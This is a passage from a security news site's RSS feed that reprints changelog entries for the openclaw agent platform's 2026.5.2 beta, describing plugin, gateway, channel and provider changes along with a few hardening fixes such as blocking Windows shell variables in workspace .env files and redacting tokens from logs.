<p>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</p>
</li>
<li>
<p>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</p>
</li>
<li>
<p>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</p>
</li>
<li>
<p>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</p>
</li>
<li>
<p>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</p>
</li>
<li>
<p>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2-beta.2]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks @vincentkoc.
Gateway startup, session listing, task maintenanc...]]></description>
<link>https://tsecurity.de/de/3482814/downloads/openclaw-202652-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482814/downloads/openclaw-202652-beta2/</guid>
<pubDate>Sat, 02 May 2026 22:46:16 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway startup, session listing, task maintenance, prompt prep, plugin loading, and filesystem hot paths get targeted cache and fanout reductions for large or plugin-heavy installs.</li>
<li>Control UI and WebChat reliability improves across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Channel and provider fixes cover Telegram topic commands and networking, Discord delivery and startup edge cases, OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, Brave/SearXNG/Firecrawl web search, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>
<p>Gateway/startup: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</p>
</li>
<li>
<p>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</p>
</li>
<li>
<p>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params so stable embedded-run inputs no longer repeat plugin registry resolution while model-specific transport hook patches stay isolated. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/runtime: memoize transcript replay-policy resolution for stable config and process-env runs while preserving custom-env provider hook behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</p>
</li>
<li>
<p>Tools: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize ACPX behind the official <code>@openclaw/acpx</code> package so packaged installs keep ACP harness adapter binaries out of core until the ACP backend is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize diagnostics OpenTelemetry behind the official <code>@openclaw/diagnostics-otel</code> package so packaged installs keep the OTEL dependency stack out of core until the plugin is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Google Chat, LINE, Matrix, and Mattermost for <code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, and Zalo Personal for <code>2026.5.1-beta.2</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, and WhatsApp for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</p>
</li>
<li>
<p>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, and add <code>googlemeet end-active-conference</code> for closing managed spaces after a call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a>.</p>
</li>
<li>
<p>Google Meet: add <code>googlemeet test-listen</code> and the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verifying the ClawPack response header and downloaded bytes before installing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: persist ClawPack digest metadata on ClawHub plugin install and update records so registry refreshes and download verification can reuse stored artifact facts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/onboarding: allow install-on-demand provider setup entries to persist ClawHub artifact metadata after explicit ClawHub installs while retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</p>
</li>
<li>
<p>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</p>
</li>
<li>
<p>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</p>
</li>
<li>
<p>Dependencies: refresh workspace dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, and Marked 18.0.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</p>
</li>
<li>
<p>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</p>
</li>
<li>
<p>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</p>
</li>
<li>
<p>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Dependencies: refresh bundled runtime and plugin dependency pins, including Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</p>
</li>
<li>
<p>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</p>
</li>
<li>
<p>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</p>
</li>
<li>
<p>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</p>
</li>
<li>
<p>Slack: publish a safe default App Home tab view on <code>app_home_opened</code> and include the Home tab event in setup manifests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Slack: keep track of bot-participated threads across restarts, so ongoing threaded conversations can continue auto-replying after the Gateway is restarted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</p>
</li>
<li>
<p>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
